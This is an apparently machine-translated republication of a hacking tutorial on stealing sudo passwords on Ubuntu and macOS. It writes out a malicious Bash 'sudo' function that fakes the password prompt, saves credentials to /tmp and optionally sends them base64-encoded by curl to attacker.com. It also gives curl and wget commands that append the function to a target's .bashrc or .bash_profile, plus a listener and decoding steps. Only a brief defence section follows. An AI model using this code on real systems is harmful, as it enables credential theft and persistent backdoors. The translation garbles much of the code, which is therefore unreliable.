قالب وردپرس درنا توس
Home / Tips and Tricks / How to steal Ubuntu & MacOS Sudo passwords without cracking «Null Byte :: WonderHowTo

How to steal Ubuntu & MacOS Sudo passwords without cracking «Null Byte :: WonderHowTo



With a simple trick for social engineering, sudo passwords can be captured in seconds without the knowledge of the target. The passwords can then be saved in a file or filtered out to another computer on the network.

After operating a system, penetration testers and hackers will often start with privilege escalation (private) attacks. Such attacks include kernel exploitation and password phishing. The attack proposed here follows a social engineering approach by using Bash functions to match the functionality of the command sudo .

How Sudo should work

Let's use the following whoami and id commands & # 39; s as an example. If we enter whoami in a terminal, it returns the current username.

  ~ $ whoami

tokyoneon 

With the command id it returns the user's id ( -u ), a unique identifier assigned to each user on the system. By default, in Debian and Ubuntu systems, a normal user (non-root user) is assigned the uid 1000 (shown below). In the same way, a normal user in macOS gets the 501 uid.

  ~ $ id -u

1000 

If prepared, sudo increases and executes the given command with root (uid 0) privileges. This is all standard and normal behavior for sudo and Unix systems.

  ~ $ sudo id -u

0 

The type command can be used to identify how the specified command is interpreted by the shell.

  ~ $ sudo type

sudo is / usr / bin / sudo 

In this case, sudo is interpreted as / usr / bin / sudo. This is also standard behavior. When someone executes the command sudo (for example, sudo whoami ), they essentially do the following.

  ~ $ / usr / bin / sudo / usr / bin / whoami

root 

Recommended book on Amazon: Sudo Mastery: user access control for real people

How Bash functions work

The way in which sudo (or a related assignment) can be interpreted be adjusted in a way that is transparent to the user. Just like Bash aliases, complex functions can be imported into the shell. Take the GIF below as an example.

We can see that an ordinary apt-get update command failed because "sudo" is no longer interpreted as a direct link to the real sudo binary file. It is now a function that prints random text. This can be misused very easily. The "sudo" function can behave exactly like the real sudo, while recording and filtering the password of the target.

You must already have external access.

This article assumes that external access to the target system is set up. With macOS targets, this can be achieved with a non-detectable payload, USB drop attack or USB Rubber Ducky. Ubuntu and Debian servers can also be exploited using various SSH and server-based vulnerabilities.

Step 1: Create a Malicious Bash Function

This type of abuse is better demonstrated in the function below. Comments have been added in green to explain the importance of each rule.

  function sudo () {
# A "realsudo" variable is created. It calls the "which" command to locate
# the path to the real sudo binary file. This is used later in the function to
# execute the desired command of the target.
realsudo = "$ (which sudo)"

# The `read` command (` -p`) will request the target with a convincing password
# request. The `-s` argument hides the input password, just like the real one
# sudo command would. The target password is then set in the "inputPasswd"
# variable.
read -s -p "[sudo] password for $ USER:" inputPasswd

# There are two `printf` commands here, separated by a semicolon.
# The first simply prints a new line in the terminal, like the real sudo
# is doing. The second writes the username and password of the target in one
# file named "hackedPasswd.txt" in the / tmp folder.
printf " n"; printf & # 39;% s  n & # 39; "$ USER: $ inputPasswd"> /tmp/hackedPasswd.txt

# As an alternative to writing the password to the / tmp folder,
# it can be filtered out to the attacker's server. Uncomment the below
# "coded" and "curled" lines to enable this function. The password
# is encoded with `base64` to make sending in the URL easier.
# encoded = $ (printf & # 39;% s & # 39; "$ inputPasswd" | base64)> / dev / null 2> & 1
# curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1

# The `-S` option allows users to enter their sudo password using the command
# rule. This is used to execute any `exit` command (` -c`) as root
# user (`-u`) to unlock the sudo timeout function. This command and are
# output is hidden (/ dev / null) from the target. It is only here to allow
# sudo use for future assignments.
# For more information about sudo timeouts and / dev / null:
# https://itsfoss.com/change-sudo-password-timeout-ubuntu/
# https://stackoverflow.com/questions/10508843/what-is-dev-null-21
$ realsudo -S << < "$inputPasswd" -u root bash -c "exit" > / dev / null 2> & 1

# If the sudo timeout is enabled, privileged commands can be executed without
# asks the user for a password. This rule executes the goals
# desired assignment.
$ realsudo "$ {@: 1}"
} 

Let's see what this function looks like for the purpose.

As we can see, the target is still being asked for a password request when trying to install software. A closer look at type reveals the malicious function. The recorded password is stored in the /tmp/hackedPasswd.txt file.

Option 1: Target Debian & Ubuntu Systems

With Debian and Ubuntu systems, when a new terminal or shell is opened, the ~ / .bashrc file is executed. This file (which can be changed by non-root users) usually defines useful attributes such as aliases, history limit, and color variables. It can also be misused to import malicious Bash functions. This applies to Debian servers, Ubuntu desktops and macOS systems.

For convenience, I have uploaded the malicious sudo function to my GitHub page. It can be downloaded to the target system using the command below.

  ~ $ curl & # 39; https: //git.io/fhNWm&#39; >> ~ / .bashrc 

This is added ( >> ) the sudo function at the bottom of the .bashrc file of the target. From now on, when the target logs in to their server (for example, SSH) and executes a sudo command, the submitted password is stored in the / tmp folder. Alternatively, curl is not installed on the target system, wget can be used.

  ~ $ wget -O- & # 39; https: //git.io/fhNWm&#39; >> ~ / .bashrc 

Option 2: Target macOS systems

This type of attack is less effective against macOS users. Simply because it is not so likely that they will open a terminal and execute elevated commands. MacOS users do not need the command sudo as often as VPS targets or Ubuntu desktop users. However, I will show how to set this against a macOS target, as it may be useful for some penetration testers to explore every possible route to raise their back door.

Like the ~ / .bashrc, macOS systems execute the ~ / .bash__profile file when Terminal is opened. Malicious Bash functions can be saved in this file. Use the wget command below to import the function into the Bash profile of the target.

  ~ $ wget -O- & # 39; https: //git.io/fhNWm&#39; >> ~ / .bash_profile 

When the target Terminal opens and executes a sudo command, the password is stored in the / tmp folder. This is illustrated in the screenshot below.

Step 2: Filter the password (optional)

In addition to saving the password in the / tmp folder, it may be desirable to transfer the password to it send another computer or server. A proper PHP listener can be set to properly intercept the POST data with the password.

I decided to follow a somewhat unorthodox approach and offer a quick and dirty solution. This method requires a simple Python3 server that is set to the attacker's Kali system. The module http.server ( -m ) creates a web server with port 80 .

  ~ $ python3 -m http.server 80

Serving on HTTP on 0.0.0.0 port 80 ... 

There are commands for encrypting and exfiltrating passwords written in the sudo function. It is disabled by default and does not need to be added to enable it.

  encoded = $ (printf & # 39;% s & # 39; "$ inputPasswd" | base64)> / dev / null 2> & 1;
curl -s "http://attacker.com/$USER:$encoded"> / dev / null 2> & 1; 

The password is encrypted with base64 to send the URL. Curl is used to silently ( -s ) make a GET request on the attacker's server on the "attacker.com" domain. This domain must be changed to the attacker's local IP address (192.168.1.X) or the VPS IP address. Errors and outputs generated by the command curl are forced into / dev / null with the redirect 2> & 1. This prevents curl from accidentally reporting errors in the terminal if the attacker's server requests a for some reason is inaccessible.

The username and password of the target are actually sent in the URL. Imagine submitting a request for "http: //192.168.1.X/tokyoneon: sUp3R-S3cUre_P @ $$ w0000rD!." The request would certainly fail, & & # 39; n webpage does not exist. However, the encrypted password would be stored in the attacker's error log. Below is an example of such an error.

  Serving on HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [27/Feb/2019 00:05:12] code 404, message File not found
127.0.0.1 - - [27/Feb/2019 00:05:12] "GET / user: c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == HTTP / 1.1" 404 - 

Simply echo the encrypted password in base64 [19459005000005[194590069005][1945]) it.

  ~ $ echo & # 39; c1VwM1ItUzNjVXJlX1BAJCR3MDAwMHJEIQ == & # 39; | base64 -d

sUp3R-S3cUre_P @ $$ w0000rD! 

How to protect against misuse of the Bash function

Malicious Bash functions can be difficult to detect. If there is an attacker on your system that is changing the file ~ / .bashrc or ~ / .bash_profile, you may be concerned about larger issues.

As we have previously learned, the type command is an extremely useful tool. It can be used to print the given interpretation of the command shell. Command & # 39; s such as sudo should only call the correct binary or sometimes appear as "hashed" in the session. All other conditions must be investigated.

  ~ $ sudo type

sudo is / usr / bin / sudo 

It is also a good idea to manually inspect the ~ / .bashrc file. Hacker & # 39; s will often use this file to embed persistent backdoors in Unix systems (for example, try a new Netcat connection every time a terminal is opened). This can be done with nano or vim .

  ~ $ nano ~ / .bashrc 

Final Thoughts

This type of social engineering attack has many uses. Similar functions can be created, for example, for ssh and other external management protocols. It would be possible for an attacker to steal SSH credentials and run them to other systems within the control of the target. Similarly, a malicious function for the su command can be created. This command, such as sudo is designed to increase user rights and can easily be simulated using simple Bash functions.

If you liked this article, follow me on Twitter @tokyoneon_ and GitHub to keep track of my current projects. For questions and comments, leave a comment below or send me a message on Twitter.

Don't miss it: Use the Cowrie SSH Honeypot to capture attackers on your network

Cover photo by Arian Darvishi / Unsplash; Screenshots from tokyoneon / Null Byte




Source link